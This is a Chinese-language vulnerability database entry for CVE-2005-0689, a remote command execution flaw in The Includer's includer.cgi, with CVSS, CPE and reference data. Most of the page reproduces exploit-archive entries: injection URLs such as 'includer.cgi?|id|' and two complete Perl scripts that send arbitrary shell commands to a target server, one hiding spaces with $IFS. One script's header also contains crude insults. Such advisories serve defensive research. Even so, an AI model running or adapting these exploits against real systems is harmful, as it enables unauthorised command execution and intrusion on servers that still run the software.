CVE-2005-0689
CVSS7.5
发布时间 :2005-03-07 00:00:00
修订时间 :2016-10-17 23:13:43
NMCOE    

[原文]includer.cgi in The Includer allows remote attackers to execute arbitrary commands via shell metacharacters in (1) the URL or (2) the template parameter.


[CNNVD]The Includer 远程命令执行漏洞(CNNVD-200503-062)

        远程攻击者可以借助The Includer中的includer.cgi,通过(1) URL或(2) template参数中的shell元字符执行任意命令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:jimmy:the_includer:1.1
cpe:/a:jimmy:the_includer:1.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0689
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0689
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200503-062
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=111021730710779&w=2
(UNKNOWN)  BUGTRAQ  20050307 Remote Command Execution
http://marc.info/?l=bugtraq&m=111030957413411&w=2
(UNKNOWN)  BUGTRAQ  20050308 Re: Remote Command Execution
http://www.securityfocus.com/bid/12738
(VENDOR_ADVISORY)  BID  12738

- 漏洞信息

The Includer 远程命令执行漏洞
高危 输入验证
2005-03-07 00:00:00 2005-10-20 00:00:00
远程  
        远程攻击者可以借助The Includer中的includer.cgi,通过(1) URL或(2) template参数中的shell元字符执行任意命令。

- 公告与补丁

        暂无数据

- 漏洞信息 (862)

The Includer CGI <= 1.0 Remote Command Execution (EDBID:862)
cgi webapps
2005-03-07 Verified
0 Francisco Alisson
N/A [点击下载]
Remote Command Execution on:

Example I.: www.host-vulnerable.com/includer.cgi?|id|
Example II.: www.host-vulnerable.com/includer.cgi?template=|id|

# milw0rm.com [2005-03-07]
		

- 漏洞信息 (922)

The Includer CGI <= 1.0 Remote Command Execution (new version) (EDBID:922)
cgi webapps
2005-04-08 Verified
0 GreenwooD
N/A [点击下载]
#!/usr/bin/perl

############################################################
# Target - The Includer CGI <= 1.0                         #
#                                                          #
# Based on - http://www.milw0rm.com/id.php?id=862          #
#                                                          #
# Info about bug - Stupid use "Open" function.             #
#                                                          #
############################################################
# If you want know more visit our home page at nst.void.ru #
############################################################
use IO::Socket;


if (@ARGV < 3)
{
  print " \n Includer CGI <= 1.0 Network Security Team - nst.void.ru\n\n";
  print " Usage: <target> <dir> <cmd>\n\n"; 
  print "   <host> - Host name of taget.\n";
  print "   <dir> - If not in dir type / symbol.\n";
  print "   <cmd> - command for execution.\n\n";
  print " Examples:\n\n";
  print "   incl_10.pl 127.0.0.1 /cgi-bin/ \"ls -la\"\n";
  print "   incl_10.pl 127.0.0.1 / \"uname -a\"\n";
  print "   incl_10.pl www.test.com / \"ps auxw\"\n";
  exit();
}


$serv = $ARGV[0];
$serv =~ s/http:\/\///ge;

$dir = $ARGV[1];
$cmd = $cmde = $ARGV[2];
  
print "\n ===[ Info for query ]========================\n";   
print " = Target: $serv\n";
print " = Dir: $dir\n";
print " = Cmd: $cmd\n";
print " =============================================\n\n";   

$cmde =~ s/ /"\$IFS"/ge;

$req  = "GET http://$serv";                                      
$req .= "$dir";
$req .= "includer.cgi?|echo\$IFS\"_N_\";$cmde;echo\$IFS\"_T_\"| HTTP/1.0\n\n";


$s = IO::Socket::INET->new(Proto=>"tcp",
                           PeerAddr=>"$serv",
                           PeerPort=>80) or die " (-) - Can't connect to the server\n";

print $s $req;

$flag = 0;

while ($ans = <$s>)

 {
   if ($ans =~ /_T_/) { print " =========================================================\n"; exit() }
   if ($flag == 1) { print " $ans"; }
   if ($ans =~ /^_N_/) { print " ===[ Executed command $cmd ]===============================\n"; $flag = 1 }
   
 }

# milw0rm.com [2005-04-08]
		

- 漏洞信息 (923)

The Includer CGI <= 1.0 Remote Command Execution (new version2) (EDBID:923)
cgi webapps
2005-04-08 Verified
0 K-C0d3r
N/A [点击下载]
#!/usr/bin/perl
#
# [K-C0d3r] Includer.cgi 1.0 remote command execution [K-C0d3r]
#
# C0d3d By K-C0d3r, a www.x0n3-h4ck.org friend!
#
# I think the bug was discovered by Francisco Alisson.
#
# Greetz to: mZ, CorryL, Expanders, SiNaPsE, off, rikky, milw0rm.
#
# F**K o*f to all RxBot kiddies as e*****t, G***n, d***b.
#
##########################################################################
# [kc@K-C0d3r xpl]$ perl KCincluder.pl 127.0.0.1 /cgi-bin/includer.cgi 1
# [K-C0d3r] Includer.cgi Remote Command Execution Exploit [K-C0d3r]
# [?] Insert command: id
# [+] Conecting to 127.0.0.1
# [+] Connected to 127.0.0.1
# [+] Injecting command ...
# uid=500(kc) gid=500(kc) gruppi=500(kc)
# [kc@K-C0d3r xpl]$
##########################################################################

use IO::Socket;

sub Usage {
print STDERR "Usage:\nKCinc-xpl.pl <www.victim.com> </path/to/includer.cgi> <exploitation_type>.\n";
print STDERR "Exploitation Types:\n \t\t1: includer.cgi?|command|\n \t\t2: includer.cgi?template=|command|\n\n";
exit;
}

if (@ARGV < 3)
{
 Usage();
}


$host = @ARGV[0];
$path = @ARGV[1];
print "[K-C0d3r] Includer.cgi Remote Command Execution Exploit [K-C0d3r]\n";
print "[?] Insert command: ";
$command = <STDIN>;
$type = @ARGV[2];

if ($type > 2)
{
 Usage();
}


print "[+] Conecting to $host\n";

if ($type = 1)
{
$injection = "$host$path?|$command|";
$socket = new IO::Socket::INET (PeerAddr => "$host",
                                PeerPort => 80,
                                Proto => 'tcp');
                                die unless $socket;
print "[+] Connected to $host\n";
print "[+] Injecting command ...\n";
print $socket "GET http://$injection HTTP/1.1\nHost: $host\n\n";
while (<$socket>)
{
 print $_;
 exit;
}
}

if ($type = 2)
{
$injection = "$host$path?template=|$command|";
$socket = new IO::Socket::INET (PeerAddr => "$host",
                                PeerPort => 80,
                                Proto => 'tcp');
                                die unless $socket;
print "[+] Connected to $host\n";
print "[+] Injecting command\n";
print $socket "GET http://$injection HTTP/1.1\nHost: $host\n\n";
while (<$socket>)
{
 print $_;
 exit;
}
}

# milw0rm.com [2005-04-08]
		

- 漏洞信息

14624
The Includer includer.cgi Arbitrary Command Execution
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-03-07 Unknow
2005-03-07 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站